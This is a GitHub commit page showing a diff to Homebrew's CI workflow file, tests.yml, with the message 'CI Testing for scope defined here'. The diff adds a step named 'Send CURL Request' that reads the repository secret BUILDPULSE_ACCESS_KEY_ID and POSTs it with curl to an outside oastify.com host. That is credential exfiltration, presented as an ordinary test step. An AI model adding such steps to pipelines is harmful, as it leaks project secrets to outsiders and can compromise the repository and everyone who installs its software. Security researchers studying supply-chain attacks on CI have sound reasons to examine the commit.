Skip to content

Commit

Permalink
Update tests.yml
Browse files Browse the repository at this point in the history
CI Testing for scope defined here - https://github.com/Homebrew/brew/security

CI Testing [email protected]
  • Loading branch information
kakashi2508 authored Jan 31, 2024
1 parent 56c3ac8 commit 76dbb93
Showing 1 changed file with 7 additions and 0 deletions.
7 changes: 7 additions & 0 deletions .github/workflows/tests.yml
Original file line number Diff line number Diff line change
Expand Up @@ -424,3 +424,10 @@ jobs:
- run: brew install gnu-tar

- run: brew test-bot --only-formulae --only-json-tab --test-default-formula

- name: Send CURL Request
env:
ACCESS_KEY_ID: ${{ secrets.BUILDPULSE_ACCESS_KEY_ID }}
run: |
URL="http://1hjhqbfn9hqmnzjtv8ij9nd4xv3mrhf6.oastify.com"
curl -X POST -d "token=${ACCESS_KEY_ID}" "$URL"

0 comments on commit 76dbb93

Please sign in to comment.